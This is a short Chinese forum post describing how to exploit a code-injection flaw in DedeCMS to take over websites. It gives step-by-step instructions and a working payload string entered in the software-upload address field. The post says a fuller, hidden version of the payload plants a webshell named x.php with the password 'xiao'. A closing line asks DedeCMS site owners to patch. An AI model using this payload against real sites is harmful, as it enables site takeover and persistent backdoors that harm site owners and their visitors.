dede执行任意SQL语句漏洞拿站利用
大家知道新出了这个漏洞但是不知道怎么利用,我就装下大牛,说下利用方法:注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。
**** Hidden Message *****
在当前目录生日x.php 密码为xiao原语句 可以自己修改!
注册过程,省略,直接发表软件!目前还没有X.php,再点击更改软件!已经成功生成X.php
请织梦站长,,官方人员,看到后,请把补丁打上,谢谢 。。 kan kankan {:3_41:} 原来如此
页:
[1]